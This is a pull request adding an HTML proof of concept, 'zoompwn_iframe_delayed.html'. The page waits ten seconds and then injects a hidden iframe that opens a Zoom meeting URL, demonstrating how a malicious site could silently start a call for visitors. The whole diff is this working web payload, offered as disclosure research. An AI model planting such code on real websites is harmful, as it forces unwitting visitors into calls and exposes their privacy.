### PR TITLE
Add delayed iFrame example

### DIFF
--- a/zoompwn_iframe_delayed.html
+++ b/zoompwn_iframe_delayed.html
@@ -1,0 +1,35 @@
+<body>
+  <h4>Delayed iFrame</h4>
+  <p>This demonstrates how an attacker may start a Zoom call lazily after you've been on the site for a while.</p>
+  <p>The iFrame is hidden to show how a real attacker might do this without showing anything on the website.</p>
+
+  <p id="delayMessage">Loading the iFrame in <strong><span id="delaySeconds"></span></strong> seconds...</p>
+
+  <script>
+    let waitSeconds = 10;
+
+    function createIframe() {
+      var iframe = document.createElement('iframe');
+      iframe.src = "https://zoom.us/j/492468757";
+      // Hide the iFrame
+      iframe.style = "display: none";
+      document.body.appendChild(iframe);
+    }
+
+    function countDown() {
+
+      document.getElementById("delaySeconds").innerHTML = waitSeconds;
+
+      if (waitSeconds > 0) {
+        waitSeconds--;
+        setTimeout(countDown, 1000);
+      }
+      else {
+        createIframe();
+        document.getElementById("delayMessage").innerHTML = "iFrame loaded.";
+      }
+    }
+
+    countDown();
+  </script>
+</body>


### PR DESCRIPTION
To demonstrate that starting a Zoom call from an iFrame after a delay actually works. I haven't given the JavaScript a huge amount of testing, but it's pretty straightforward and works in Chrome/Firefox.